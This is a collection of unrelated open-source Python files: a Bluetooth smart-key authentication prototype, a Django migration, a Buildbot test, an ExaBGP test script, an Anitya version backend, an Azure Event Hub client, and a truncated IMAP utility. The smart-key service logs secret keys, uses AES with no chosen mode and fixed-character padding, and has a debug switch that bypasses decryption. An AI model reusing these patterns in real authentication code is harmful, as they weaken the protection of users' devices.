__author__ = 'jtromo' #Developed at : SEFCOM Labs by James Romo from bluetooth import * from Crypto.Cipher import AES import threading import time import base64 import os import uuid # ///////////////////////////////////////////////////////////////////////////// # Configuration # ///////////////////////////////////////////////////////////////////////////// # ---------------------------------- Flags ------------------------------------ # Logging Level Controls LOGGING_INFO = 1 LOGGING_DEBUG = 1 LOGGING_ERROR = 1 # Determines which protocol components need creation (if not, read from disk) REQUIRES_SHARED_SECRET_GENERATION = 1 REQUIRES_SMARTKEY_ID_GENERATION = 1 REQUIRES_TRUSTED_DEVICES_GENERATION = 1 # Causes the service to use a sample message from the device instead of real DEBUG_USE_SAMPLE_DEVICE_MESSAGE = 1 if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: print '////////////////////////////////////////////////////////////////////' print '----------------------------- WARNING ------------------------------' print ' ******* Testing Mode Enabled *******' print ' Using sample device message' print ' Must be disabled for demo' print '////////////////////////////////////////////////////////////////////' # -------------------------------- Encryption --------------------------------- # the block size for the cipher object; must be 16, 24, or 32 for AES BLOCK_SIZE = 32 # the character used for padding--with a block cipher such as AES, the value # you encrypt must be a multiple of BLOCK_SIZE in length. This character is # used to ensure that your value is always a multiple of BLOCK_SIZE PADDING = '{' # one-liner to sufficiently pad the text to be encrypted pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING # one-liners to encrypt/encode and decrypt/decode a string # encrypt with AES, encode with base64 EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) # ---------------------- Protocol Components Generation ----------------------- # ********* shared_secretKey ********** # 1) Generate a new shared_secretKey (if required) if REQUIRES_SHARED_SECRET_GENERATION: new_shared_secretKey = os.urandom(BLOCK_SIZE) if LOGGING_DEBUG: print 'Newly generated shared_secretKey:', new_shared_secretKey # 2) Save new shared_secretKey to a file (if required) if REQUIRES_SHARED_SECRET_GENERATION: with open('shared_secretKey', 'w') as file_: file_.write(new_shared_secretKey) if LOGGING_DEBUG: print 'Successfully saved new shared_secretKey' # 3) Read shared_secretKey from file shared_secretKeyFile = open('shared_secretKey') read_shared_secretKey = shared_secretKeyFile.read() if LOGGING_DEBUG: print 'shared_secretKey from file:', read_shared_secretKey # 4) Create a cipher object using shared_secretKey cipher = AES.new(read_shared_secretKey) # *********** smartKey_id ************* # 5) Generate a new smartKey_id (if required) if REQUIRES_SMARTKEY_ID_GENERATION: new_smartKey_id = uuid.uuid4() if LOGGING_DEBUG: print 'Newly generated smartKey_id:', new_smartKey_id # 6) Save new smartKey_id to a file (if required) if REQUIRES_SMARTKEY_ID_GENERATION: with open('smartKey_id', 'w') as file_: file_.write(new_smartKey_id) if LOGGING_DEBUG: print 'Successfully saved new smartKey_id' # 7) Read shared_secretKey from file smartKey_idFile = open('smartKey_id') read_smartKey_id = smartKey_idFile.read() if LOGGING_DEBUG: print 'smartKey_id from file:', read_smartKey_id # ********** trusted_devices ********** # 8) Generate a new list of trusted_devices (if 
required) if REQUIRES_TRUSTED_DEVICES_GENERATION: new_trusted_devices = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()] if LOGGING_DEBUG: print 'Newly generated trusted_devices:', new_trusted_devices # 9) Save new list of trusted_devices to a file (if required) if REQUIRES_TRUSTED_DEVICES_GENERATION: with open('trusted_devices', 'w') as file_: file_.write(new_trusted_devices) if LOGGING_DEBUG: print 'Successfully saved new trusted_devices' # -------------------------- Protocol Components ------------------------------ smartKey_id = read_smartKey_id shared_secretKey = read_shared_secretKey # Sample from phone key sample_device_id = uuid.uuid4() # List of trusted device_ids if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: trusted_devices = [sample_device_id] else: # TODO: Place generated uuid's here trusted_devices = ['trusted1', 'trusted2', 'trusted3', 'trusted4'] # ///////////////////////////////////////////////////////////////////////////// # Client Response Thread # ///////////////////////////////////////////////////////////////////////////// class ClientResponseThread (threading.Thread): def __init__ (self, socket): self.socket = socket threading.Thread.__init__(self) def run (self): try: # Generate timestamp for protocol timestamp = time.time() if LOGGING_DEBUG: print 'timestamp:', timestamp # Create decodedMsg: device_id, timestamp decodedMsg = smartKey_id + '-' + str(timestamp) if LOGGING_DEBUG: print 'decodedMsg:', decodedMsg # Encode message: secretKey(device_id, timestamp) encodedMsg = EncodeAES(cipher, decodedMsg) if LOGGING_DEBUG: print 'encodedMsg:', encodedMsg # Send response self.socket.send (encodedMsg) except: print "Fatal error has occurred during client response. Closing socket..." if LOGGING_ERROR: e = sys.exc_info() print 'Response Thread:', e self.socket.close() # ///////////////////////////////////////////////////////////////////////////// # Smart Key Service # ///////////////////////////////////////////////////////////////////////////// # ---------------------- Bluetooth Socket Configuration ----------------------- server_sock = BluetoothSocket(RFCOMM) server_sock.bind(("", PORT_ANY)) server_sock.listen(1) port = server_sock.getsockname()[1] uuid = "a60f35f0-b93a-11de-8a39-08002009c666" advertise_service(server_sock, "SmartKey", service_id=uuid, service_classes=[uuid, SERIAL_PORT_CLASS], profiles=[SERIAL_PORT_PROFILE], ) if LOGGING_INFO: print("Waiting for connection on RFCOMM channel %d" % port) client_sock, client_info = server_sock.accept() if LOGGING_INFO: print("Accepted connection from ", client_info) # ---------------------------- Bluetooth Service ------------------------------ try: while True: # Retrieve data sent by mobile device data = client_sock.recv(1024) if len(data) > 0: if LOGGING_DEBUG: print("Encoded message received from mobile device: [%s]" % data) # ****** Verify the message came from trusted valid device ****** try: # Decode encrypted message if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: # In place until Android encryption is finished decoded_device_id = sample_device_id else: decoded_device_id = DecodeAES(cipher, data) if LOGGING_DEBUG: print 'Decoded device_id', decoded_device_id # Verify if device_id is in trusted_devices if decoded_device_id in trusted_devices: if LOGGING_INFO: print decoded_device_id, 'verified as a trusted device. Sending response...' ClientResponseThread(client_sock).start() else: if LOGGING_INFO: print decoded_device_id, 'not found in list of trusted_devices' except: print 'Incorrect encrypted data format. Cannot be decoded.' 
if LOGGING_ERROR: e = sys.exc_info() print 'Decode:', e else: if LOGGING_DEBUG: print 'No data has been received received' except : print 'Fatal error has occurred during bluetooth service. Disconnecting...' if LOGGING_ERROR: e = sys.exc_info() print 'Bluetooth Service:', e # --------------------------------- Exiting ----------------------------------- print("Smart Key Bluetooth Service has stopped.") # Close all sockets client_sock.close() server_sock.close() print("Please Restart service.")
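# -----------------------------------------------------------------------------
# Illustrative round trip (a sketch using a throwaway key rather than the
# service's shared_secretKey) of the pad/encrypt/base64 scheme above.
def _demo_round_trip():
    demo_cipher = AES.new(os.urandom(BLOCK_SIZE))
    token = EncodeAES(demo_cipher, 'device-id-1234')
    return DecodeAES(demo_cipher, token) == 'device-id-1234'  # True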
jtromo/ASU-Thesis-RaspberryPiSmartKey
RaspberryPiSmartKey/.sync/Archive/RaspberryPiService/SmartKeyService.9.py
Python
apache-2.0
8,829
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'AuthoredData.processing_id' db.add_column(u'dingos_authoring_authoreddata', 'processing_id', self.gf('django.db.models.fields.CharField')(default='', max_length=128, blank=True), keep_default=False) def backwards(self, orm): # Deleting field 'AuthoredData.processing_id' db.delete_column(u'dingos_authoring_authoreddata', 'processing_id') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'dingos.datatypenamespace': { 'Meta': {'object_name': 'DataTypeNameSpace'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}), 'uri': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.fact': { 'Meta': {'object_name': 'Fact'}, 'fact_term': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTerm']"}), 'fact_values': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.FactValue']", 'null': 'True', 'symmetrical': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'value_iobject_id': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'value_of_set'", 'null': 'True', 'to': u"orm['dingos.Identifier']"}), 'value_iobject_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}) }, u'dingos.factdatatype': { 'Meta': {'unique_together': "(('name', 'namespace'),)", 'object_name': 'FactDataType'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'kind': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_data_type_set'", 'to': u"orm['dingos.DataTypeNameSpace']"}) }, u'dingos.factterm': { 'Meta': {'unique_together': "(('term', 'attribute'),)", 'object_name': 'FactTerm'}, 'attribute': ('django.db.models.fields.CharField', [], {'max_length': '128'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'term': ('django.db.models.fields.CharField', [], {'max_length': '512'}) }, u'dingos.facttermnamespacemap': { 'Meta': {'object_name': 'FactTermNamespaceMap'}, 'fact_term': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTerm']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'namespaces': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.DataTypeNameSpace']", 'through': u"orm['dingos.PositionalNamespace']", 'symmetrical': 'False'}) }, u'dingos.factvalue': { 'Meta': {'unique_together': "(('value', 'fact_data_type', 'storage_location'),)", 'object_name': 'FactValue'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'fact_data_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_value_set'", 'to': u"orm['dingos.FactDataType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'storage_location': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}), 'value': ('django.db.models.fields.TextField', [], {}) }, u'dingos.identifier': { 'Meta': {'unique_together': "(('uid', 'namespace'),)", 'object_name': 'Identifier'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'latest': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'latest_of'", 'unique': 'True', 'null': 'True', 'to': u"orm['dingos.InfoObject']"}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.IdentifierNameSpace']"}), 'uid': ('django.db.models.fields.SlugField', [], {'max_length': '255'}) }, u'dingos.identifiernamespace': { 'Meta': {'object_name': 'IdentifierNameSpace'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': 
('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_substitution': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}), 'uri': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.infoobject': { 'Meta': {'ordering': "['-timestamp']", 'unique_together': "(('identifier', 'timestamp'),)", 'object_name': 'InfoObject'}, 'create_timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'facts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.Fact']", 'through': u"orm['dingos.InfoObject2Fact']", 'symmetrical': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.Identifier']"}), 'iobject_family': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.InfoObjectFamily']"}), 'iobject_family_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['dingos.Revision']"}), 'iobject_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.InfoObjectType']"}), 'iobject_type_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['dingos.Revision']"}), 'name': ('django.db.models.fields.CharField', [], {'default': "'Unnamed'", 'max_length': '255', 'blank': 'True'}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'uri': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}) }, u'dingos.infoobject2fact': { 'Meta': {'ordering': "['node_id__name']", 'object_name': 'InfoObject2Fact'}, 'attributed_fact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attributes'", 'null': 'True', 'to': u"orm['dingos.InfoObject2Fact']"}), 'fact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_thru'", 'to': u"orm['dingos.Fact']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_thru'", 'to': u"orm['dingos.InfoObject']"}), 'namespace_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTermNamespaceMap']", 'null': 'True'}), 'node_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.NodeID']"}) }, u'dingos.infoobjectfamily': { 'Meta': {'object_name': 'InfoObjectFamily'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '256'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}) }, u'dingos.infoobjecttype': { 'Meta': {'unique_together': "(('name', 'iobject_family', 'namespace'),)", 'object_name': 'InfoObjectType'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject_family': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_type_set'", 'to': u"orm['dingos.InfoObjectFamily']"}), 'name': ('django.db.models.fields.SlugField', [], {'max_length': '30'}), 'namespace': 
('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_type_set'", 'blank': 'True', 'to': u"orm['dingos.DataTypeNameSpace']"}) }, u'dingos.nodeid': { 'Meta': {'object_name': 'NodeID'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.positionalnamespace': { 'Meta': {'object_name': 'PositionalNamespace'}, 'fact_term_namespace_map': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'namespaces_thru'", 'to': u"orm['dingos.FactTermNamespaceMap']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_term_namespace_map_thru'", 'to': u"orm['dingos.DataTypeNameSpace']"}), 'position': ('django.db.models.fields.SmallIntegerField', [], {}) }, u'dingos.revision': { 'Meta': {'object_name': 'Revision'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}) }, u'dingos_authoring.authoreddata': { 'Meta': {'unique_together': "(('group', 'user', 'identifier', 'kind', 'timestamp'),)", 'object_name': 'AuthoredData'}, 'author_view': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos_authoring.AuthorView']", 'blank': 'True'}), 'data': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identifier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos_authoring.Identifier']"}), 'kind': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}), 'processing_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, u'dingos_authoring.authorview': { 'Meta': {'object_name': 'AuthorView'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos_authoring.groupnamespacemap': { 'Meta': {'object_name': 'GroupNamespaceMap'}, 'allowed_namespaces': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'authoring_allowed_for'", 'blank': 'True', 'to': u"orm['dingos.IdentifierNameSpace']"}), 'default_namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'authoring_default_for'", 'to': u"orm['dingos.IdentifierNameSpace']"}), 'group': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, u'dingos_authoring.identifier': { 'Meta': {'object_name': 'Identifier'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos_authoring.infoobject2authoreddata': { 'Meta': {'object_name': 'InfoObject2AuthoredData'}, 'authored_data': 
('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['dingos_authoring.AuthoredData']", 'unique': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'created_from_thru'", 'unique': 'True', 'to': u"orm['dingos.InfoObject']"}) } } complete_apps = ['dingos_authoring']
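# --- Illustrative note (not part of the original migration) ---
# On a typical SQL backend, the db.add_column() call in forwards() above
# amounts to roughly:
#
#   ALTER TABLE dingos_authoring_authoreddata
#       ADD COLUMN processing_id varchar(128) NOT NULL DEFAULT '';
#
# (with keep_default=False, South drops the column default again afterwards),
# and backwards() issues the corresponding DROP COLUMN.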
siemens/django-dingos-authoring
dingos_authoring/south_migrations/0003_auto__add_field_authoreddata_processing_id.py
Python
gpl-2.0
16,713
# This file is part of Buildbot.  Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members

from twisted.trial import unittest

from buildslave.commands import shell
from buildslave.test.fake.runprocess import Expect
from buildslave.test.util.command import CommandTestMixin


class TestSlaveShellCommand(CommandTestMixin, unittest.TestCase):

    def setUp(self):
        self.setUpCommand()

    def tearDown(self):
        self.tearDownCommand()

    def test_simple(self):
        self.make_command(shell.SlaveShellCommand, dict(
            command=['echo', 'hello'],
            workdir='workdir',
        ))

        self.patch_runprocess(
            Expect(['echo', 'hello'], self.basedir_workdir)
            + {'hdr': 'headers'} + {'stdout': 'hello\n'} + {'rc': 0}
            + 0,
        )

        d = self.run_command()

        # note that SlaveShellCommand does not add any extra updates of its own
        def check(_):
            self.assertUpdates(
                [{'hdr': 'headers'}, {'stdout': 'hello\n'}, {'rc': 0}],
                self.builder.show())
        d.addCallback(check)
        return d

    # TODO: test all functionality that SlaveShellCommand adds atop RunProcess
zozo123/buildbot
slave/buildslave/test/unit/test_commands_shell.py
Python
gpl-3.0
1,818
#!/usr/bin/env python

import os
import sys
import time

# When the parent dies we are seeing continual newlines, so we only access so many before stopping
counter = 1

# sleep a little bit or we will never see the asm in the configuration file
# and the message received just before we go to the established loop will be printed twice
time.sleep(1)

print 'announce operational rpcq afi ipv4 safi unicast sequence %d' % counter
print 'announce operational rpcp afi ipv4 safi unicast sequence %d counter 200' % counter
time.sleep(1)
counter += 1

print 'announce operational apcq afi ipv4 safi unicast sequence %d' % counter
print 'announce operational apcp afi ipv4 safi unicast sequence %d counter 150' % counter
time.sleep(1)
counter += 1

print 'announce operational lpcq afi ipv4 safi unicast sequence %d' % counter
print 'announce operational lpcp afi ipv4 safi unicast sequence %d counter 250' % counter
time.sleep(1)

while True:
    try:
        time.sleep(1)
        if counter % 2:
            print 'announce operational adm afi ipv4 safi unicast advisory "this is dynamic message #%d"' % counter
            sys.stdout.flush()
        else:
            print 'announce operational asm afi ipv4 safi unicast advisory "we SHOULD not send asm from the API"'
            sys.stdout.flush()
        counter += 1
    except KeyboardInterrupt:
        pass
    except IOError:
        break
benagricola/exabgp
qa/self/operational/operational-send.py
Python
bsd-3-clause
1,319
# -*- coding: utf-8 -*- """ (c) 2014 - Copyright Red Hat Inc Authors: Pierre-Yves Chibon <[email protected]> """ from anitya.lib.backends import ( BaseBackend, get_versions_by_regex_for_text, REGEX) from anitya.lib.exceptions import AnityaPluginException import six DEFAULT_REGEX = 'href="([0-9][0-9.]*)/"' class FolderBackend(BaseBackend): ''' The custom class for project having a special hosting. This backend allows to specify a version_url and a regex that will be used to retrieve the version information. ''' name = 'folder' examples = [ 'http://ftp.gnu.org/pub/gnu/gnash/', 'http://subsurface.hohndel.org/downloads/', ] @classmethod def get_version(cls, project): ''' Method called to retrieve the latest version of the projects provided, project that relies on the backend of this plugin. :arg Project project: a :class:`model.Project` object whose backend corresponds to the current plugin. :return: the latest version found upstream :return type: str :raise AnityaPluginException: a :class:`anitya.lib.exceptions.AnityaPluginException` exception when the version cannot be retrieved correctly ''' return cls.get_ordered_versions(project)[-1] @classmethod def get_versions(cls, project): ''' Method called to retrieve all the versions (that can be found) of the projects provided, project that relies on the backend of this plugin. :arg Project project: a :class:`model.Project` object whose backend corresponds to the current plugin. :return: a list of all the possible releases found :return type: list :raise AnityaPluginException: a :class:`anitya.lib.exceptions.AnityaPluginException` exception when the versions cannot be retrieved correctly ''' url = project.version_url try: req = cls.call_url(url, insecure=project.insecure) except Exception as err: raise AnityaPluginException( 'Could not call : "%s" of "%s", with error: %s' % ( url, project.name, str(err))) versions = None if not isinstance(req, six.string_types): req = req.text try: regex = REGEX % {'name': project.name.replace('+', '\+')} versions = get_versions_by_regex_for_text( req, url, regex, project) except AnityaPluginException: versions = get_versions_by_regex_for_text( req, url, DEFAULT_REGEX, project) return versions
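# --- Illustrative sketch (not part of the original backend module) ---
# Shows what the DEFAULT_REGEX fallback above matches in a plain directory
# index page; the HTML snippet is invented purely for demonstration.
if __name__ == '__main__':
    import re

    listing = ('<a href="0.8.9/">0.8.9/</a> '
               '<a href="0.8.10/">0.8.10/</a> '
               '<a href="latest/">latest/</a>')
    print(re.findall(DEFAULT_REGEX, listing))  # ['0.8.9', '0.8.10']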
pombredanne/anitya
anitya/lib/backends/folder.py
Python
gpl-2.0
2,702
"""File for Azure Event Hub models.""" from __future__ import annotations from dataclasses import dataclass import logging from azure.eventhub.aio import EventHubProducerClient, EventHubSharedKeyCredential from .const import ADDITIONAL_ARGS, CONF_EVENT_HUB_CON_STRING _LOGGER = logging.getLogger(__name__) @dataclass class AzureEventHubClient: """Class for the Azure Event Hub client. Use from_input to initialize.""" event_hub_instance_name: str @property def client(self) -> EventHubProducerClient: """Return the client.""" async def test_connection(self) -> None: """Test connection, will throw EventHubError when it cannot connect.""" async with self.client as client: await client.get_eventhub_properties() @classmethod def from_input(cls, **kwargs) -> AzureEventHubClient: """Create the right class.""" if CONF_EVENT_HUB_CON_STRING in kwargs: return AzureEventHubClientConnectionString(**kwargs) return AzureEventHubClientSAS(**kwargs) @dataclass class AzureEventHubClientConnectionString(AzureEventHubClient): """Class for Connection String based Azure Event Hub Client.""" event_hub_connection_string: str @property def client(self) -> EventHubProducerClient: """Return the client.""" return EventHubProducerClient.from_connection_string( conn_str=self.event_hub_connection_string, eventhub_name=self.event_hub_instance_name, **ADDITIONAL_ARGS, ) @dataclass class AzureEventHubClientSAS(AzureEventHubClient): """Class for SAS based Azure Event Hub Client.""" event_hub_namespace: str event_hub_sas_policy: str event_hub_sas_key: str @property def client(self) -> EventHubProducerClient: """Get a Event Producer Client.""" return EventHubProducerClient( fully_qualified_namespace=f"{self.event_hub_namespace}.servicebus.windows.net", eventhub_name=self.event_hub_instance_name, credential=EventHubSharedKeyCredential( # type: ignore[arg-type] policy=self.event_hub_sas_policy, key=self.event_hub_sas_key ), **ADDITIONAL_ARGS, )
rohitranjan1991/home-assistant
homeassistant/components/azure_event_hub/client.py
Python
mit
2,254
# IMAP utility module # Copyright (C) 2002 John Goerzen # <[email protected]> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import re import string import types from offlineimap.ui import getglobalui try: # python 2.6 has set() built in set except NameError: from sets import Set as set quotere = re.compile('^("(?:[^"]|\\\\")*")') def debug(*args): msg = [] for arg in args: msg.append(str(arg)) getglobalui().debug('imap', " ".join(msg)) def dequote(string): """Takes a string which may or may not be quoted and returns it, unquoted. This function does NOT consider parenthised lists to be quoted. """ if not (string[0] == '"' and string[-1] == '"'): return string string = string[1:-1] # Strip off quotes. string = string.replace('\\"', '"') string = string.replace('\\\\', '\\') debug("dequote() returning:", string) return string def flagsplit(string): """Converts a string of IMAP flags to a list :returns: E.g. '(\\Draft \\Deleted)' returns ['\\Draft','\\Deleted']. (FLAGS (\\Seen Old) UID 4807) returns ['FLAGS,'(\\Seen Old)','UID', '4807'] """ if string[0] != '(' or string[-1] != ')': raise ValueError, "Passed string '%s' is not a flag list" % string return imapsplit(string[1:-1]) def options2hash(list): """convert list [1,2,3,4,5,6] to {1:2, 3:4, 5:6}""" # effectively this does dict(zip(l[::2],l[1::2])), however # measurements seemed to have indicated that the manual variant is # faster for mosly small lists. retval = {} counter = 0 while (counter < len(list)): retval[list[counter]] = list[counter + 1] counter += 2 debug("options2hash returning:", retval) return retval def flags2hash(flags): """Converts IMAP response string from eg IMAP4.fetch() to a hash. E.g. '(FLAGS (\\Seen Old) UID 4807)' leads to {'FLAGS': '(\\Seen Old)', 'UID': '4807'}""" return options2hash(flagsplit(flags)) def imapsplit(imapstring): """Takes a string from an IMAP conversation and returns a list containing its components. One example string is: (\\HasNoChildren) "." "INBOX.Sent" The result from parsing this will be: ['(\\HasNoChildren)', '"."', '"INBOX.Sent"']""" if type(imapstring) != types.StringType: debug("imapsplit() got a non-string input; working around.") # Sometimes, imaplib will throw us a tuple if the input # contains a literal. See Python bug # #619732 at 